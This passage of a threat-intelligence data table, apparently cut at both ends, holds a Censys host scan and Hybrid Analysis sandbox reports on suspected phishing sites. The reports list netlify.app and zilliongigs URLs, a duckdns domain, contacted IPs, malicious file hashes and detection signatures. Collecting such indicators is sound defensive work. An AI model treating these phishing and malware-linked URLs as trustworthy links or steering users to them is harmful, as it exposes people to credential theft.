"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.130 | 34.148.97.127 |
| 2023-05-12 02:57:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'35.229.48.116'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://lambent-longma-ea4632.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b44_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_b44_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2884"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b44_IE_EarlyTabStart_0xb38_Mutex"\n "IsoScope_b44_ConnHashTable<2884>_HashTable_Mutex"\n "IsoScope_b44_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2884"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "_A767B09C-19C8-11ED-8BC0-0800274F5046_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._9C9A08CD-19C8-11ED-8BC0-0800274F5046_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002884]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003296]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003296]\n "DCANDC04.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DCANDC04.txt]- [targetUID: 00000000-00002884]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003296]\n "background_gradient_1_" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 1x800 frames 3"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003296]\n "~DF54FDA74F2C9D3CF9.TMP" has type "data"- Location: [%TEMP%\\~DF54FDA74F2C9D3CF9.TMP]- [targetUID: 00000000-00002884]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "_9C9A08CF-19C8-11ED-8BC0-0800274F5046_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF76A1EFBFA46D1AB7.TMP" has type "data"- Location: [%TEMP%\\~DF76A1EFBFA46D1AB7.TMP]- [targetUID: 00000000-00002884]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002884]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lambent-longma-ea4632.netlify.app\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_35.229.48.116]\n\n "HTTP/1.1 404 Not Found\nCache-Control: private, max-age=0\nContent-Type: text/plain; charset=utf-8\nServer: Netlify\nX-Nf-Request-Id: 01GA7RRDK6382CB4J0YXJRCNKG\nDate: Fri, 12 Aug 2022 00:55:07 GMT\nContent-Length: 50\n\nNot Found - Request ID: 01GA7RRDK6382CB4J0YXJRCNKG"- [Source: SSL_35.229.48.116]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://lambent-longma-ea4632.netlify.app/"- [Source: Input]\n Pattern match: "https://lambent-longma-ea4632.netlify.app"- [Source: Input]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "35.229.48.116": ...\n\n URL: https://zippy-shortbread-03f361.netlify.app/ (AV positives: 15/88 scanned on 08/12/2022 00:18:47)\n URL: https://stalwart-kataifi-108318.netlify.app/?naps (AV positives: 3/89 scanned on 08/11/2022 23:01:34)\n URL: http://scintillating-bienenstitch-cd8159.netlify.app/ (AV positives: 11/88 scanned on 08/11/2022 21:54:42)\n URL: http://pommellsmarketing.com/ (AV positives: 1/88 scanned on 08/11/2022 21:21:03)\n URL: http://boblintown.wtf/ (AV positives: 1/88 scanned on 08/11/2022 21:01:09)\n File SHA256: b5e41d55aa954b191752a70e3034c91c20825af8b65fe2c709d28b25aa90f8ab (AV positives: 2/74 scanned on 07/30/2022 23:15:26)\n File SHA256: caf16699abb61a32fc60f7e822749eeb2f93bae1d29c037c3741a62e3b99d03f (AV positives: 8/73 scanned on 07/28/2022 23:29:37)\n File SHA256: 16d7a459dcc8bcdd8b62981852d62d7f7d70670ca2b0eb5e367e6ecce60181ac (AV positives: 23/75 scanned on 07/23/2022 23:08:28)\n File SHA256: ebc7b30a1d4892e47800a99f8e13bec72e1697e0c70b8c1627e1678256618653 (AV positives: 10/75 scanned on 07/23/2022 17:53:46)\n File SHA256: 1dd1a8dd4f876bac98671e060542cec1749a7375840690571f589e3a1279120e (AV positives: 1/73 scanned on 07/19/2022 11:55:41)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'3/88 Antivirus vendors marked sample as malicious (3% detection rate)'}], u'threat_level': 2, u'size': None, u'job_id': u'62f5a4518bfb7009a87660a0', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'35.229.48.116'], u'sha256': u'46e02f3d16603e5230418b021dd86036c13652e45ecaa2cdeb9280bcdefd5d71', u'sha512': u'8c7946178f9008752b8cb02de9fa8a5e2f645ad4bf11def9b4ec416f2f12c863a66b733014f11ca132740ee72a2c199873b07b0e8b670189d131649baa2d1aab', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://lambent-longma-ea4632.netlify.app/', u' | 35.229.48.116 |
| 2023-05-12 02:56:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [u'69.16.175.10', u'69.16.175.42', u'51.15.139.10', u'104.17.24.14', u'104.196.30.220', u'34.148.19.16'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://builder.zilliongigs.com/free/help56/mail?=17342', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"builder.zilliongigs.com"\n "www.upsitely.com"\n "ocsp.pki.goog"\n "code.jquery.com"\n "maindesk-userclient4.duckdns.org"\n "pxlme.me"\n "releases.jquery.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.33.83:80"\n "142.250.72.142:443"\n "172.217.14.244:443"\n "69.16.175.10:443"\n "142.251.211.225:443"\n "142.251.33.67:80"\n "69.16.175.42:443"\n "142.251.33.74:443"\n "51.15.139.10:443"\n "46.101.89.76:443"\n "104.17.24.14:443"\n "104.196.30.220:443"\n "34.148.19.16:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dd0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_dd0_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_dd0_IESQMMUTEX_0_303"\n "IsoScope_dd0_IESQMMUTEX_0_519"\n "IsoScope_dd0_ConnHashTable<3536>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_dd0_IE_EarlyTabStart_0xc38_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3536"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab26B4.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA]- [targetUID: 00000000-00003508]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003508]\n "css_5_.css" has type "ASCII text"- [targetUID: N/A]\n "spimeengine_1_.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003536]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003508]\n "A16C6C16D94F76E0808C087DFC657D99_4B05E40FE390BF95A056D55633D1B46F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\A16C6C16D94F76E0808C087DFC657D99_4B05E40FE390BF95A056D55633D1B46F]- [targetUID: 00000000-00003508]\n "unnamed_4_.png" has type "PNG image data 50 x 50 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "css_4_.css" has type "ASCII text"- [targetUID: N/A]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003508]\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D]- [targetUID: 00000000-00003508]\n "TCASEBRB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TCASEBRB.txt]- [targetUID: 00000000-00003536]\n "xprs_helper_1_.js" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "unnamed_1_.png" has type "PNG image data 50 x 50 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DF73B96DA26F860992.TMP" has type "data"- Location: [%TEMP%\\~DF73B96DA26F860992.TMP]- [targetUID: 00000000-00003536]\n "css_7_.css" has type "ASCII text"- [targetUID: N/A]\n "RecoveryStore._B2FE32CD-39EA-11ED-8CE8-0800273F99FE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab26B4.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\Cab26B4.tmp]- [targetUID: 00000000-00003508]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"GET /iframe_api HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://builder.zilliongigs.com/free/help56/mail?=17342\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.youtube.com\nDNT: 1\nConnection: Keep-Alive\nCookie: CONSENT=WP.2676ba" (Indicator: "youtube")\n "cess:function(y){if(d.onSuccess)d.onSuccess(y)},\nonError:function(y,z){if(d.onError)d.onError(z)},\nonFetchError:function(y){if(d.onError)d.onError(y)},\ntimeout:d.timeout,withCredentials:!0};g.headers["Content-Type"]||(g.headers["Content-Type"]="application/json");var 